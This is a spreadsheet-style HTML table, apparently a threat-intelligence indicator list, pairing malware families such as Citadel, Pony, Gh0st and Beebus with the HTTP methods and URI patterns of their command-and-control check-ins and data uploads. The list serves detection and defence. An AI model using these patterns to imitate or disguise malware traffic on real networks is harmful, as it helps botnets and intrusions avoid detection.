<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Carberb"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Carberb</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"FakeAV var (via Kuluoz - Asprox botnet)"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">FakeAV var (via Kuluoz - Asprox botnet)</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Favorites"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Favorites</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Favorites"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Favorites</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search?qu="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search?qu=</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Favorites"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Favorites</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Favorites"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Favorites</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Favorites"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Favorites</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Favorites"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Favorites</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gh0st"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Gh0st</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel]"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel]</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gh0st var"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Gh0st var</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/h.gif?pid =113&v=130586214568 HTTP/ 1. 1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/h.gif?pid =113&v=130586214568 HTTP/ 1. 1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Guntior - CN bootkit"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Guntior - CN bootkit</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/yx/tongji.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/yx/tongji.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Kuluoz.B downloader"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Kuluoz.B downloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.php?r=gate&fq=acc0e9de&group=sl15&debug=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.php?r=gate&fq=acc0e9de&group=sl15&debug=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Ranbyus / Triton (Spy, Banking, smart cards)"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Ranbyus / Triton (Spy, Banking, smart cards)</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/releases/index.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/releases/index.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Urausy (Ransomware)"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Urausy (Ransomware)</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Glasses"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Glasses</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ewpindex.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ewpindex.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/index000000001.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index000000001.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"LURK"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">LURK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"LURK0........x.kf.e.apgpbpa0c..#........"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">LURK0........x.kf.e.apgpbpa0c..#........</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"DNSWatch / Protux"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">DNSWatch / Protux</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"DNSWatch / Protux"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">DNSWatch / Protux</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/news.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/news.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"DNSWatch / Protux"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">DNSWatch / Protux</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/PHqgHumeay5705.mp3"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/PHqgHumeay5705.mp3</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Andromeda"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Andromeda</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/new/gate.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/new/gate.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Citadel"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Citadel</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/g.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/g.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Citadel (Zbot var)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Citadel (Zbot var)</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/C270suqdh/file.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/C270suqdh/file.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Pony loader"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Pony loader</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/ponyb/gate.php HTTP/1.0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ponyb/gate.php HTTP/1.0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Reedum"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Reedum</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"APT1 WEBC2_RAVE"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT1 WEBC2_RAVE</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/comp/sem/resources.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/comp/sem/resources.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"backdoor ?"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">backdoor ?</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/18110123/page_32262 308.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/18110123/page_32262 308.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Banechant 1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Banechant 1</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/IGKKT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/IGKKT</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Banechant payload dl 2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Banechant payload dl 2</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/adserv/logo.jpg HTTP /1.1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/adserv/logo.jpg HTTP /1.1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Beebus"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Beebus</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/windosdate/v6/default.aspx?ln=en-us"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/windosdate/v6/default.aspx?ln=en-us</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Beebus C2 checkin"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Beebus C2 checkin</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Beebus C2 checkin"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Beebus C2 checkin</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Beebus data send"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Beebus data send</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME EK"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME EK</span></td><td data-sheets-value="[null,2,"Blackhole 2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Blackhole 2</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/fded177fe12651bb038f3f11b01c4168/q.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/fded177fe12651bb038f3f11b01c4168/q.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Cookies /Cookiebag / Dalbot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cookies /Cookiebag / Dalbot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1799.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1799.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Cookies /Cookiebag / Dalbot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cookies /Cookiebag / Dalbot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/3961.html\nCookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/3961.html<br />Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs=</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Cookies /Cookiebag / Dalbot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cookies /Cookiebag / Dalbot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/8223.asp (also can be like /2007.asp,/2013.asp etc"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/8223.asp (also can be like /2007.asp,/2013.asp etc</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Cookies /Cookiebag / Dalbot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cookies /Cookiebag / Dalbot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/indexs.zip"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/indexs.zip</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Coswid"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Coswid</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/old/google.png"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/old/google.png</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"CVE-2012-0754 SWF in DOC"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CVE-2012-0754 SWF in DOC</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/test.mp4"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/test.mp4</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"CVE-2012-0779"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CVE-2012-0779</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Darkmegi"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Darkmegi</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/20111230.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/20111230.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Darkness DDos v8g"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Darkness DDos v8g</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.php?uid=587609&ver=8g%20XP"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.php?uid=587609&ver=8g%20XP</span></td></tr>
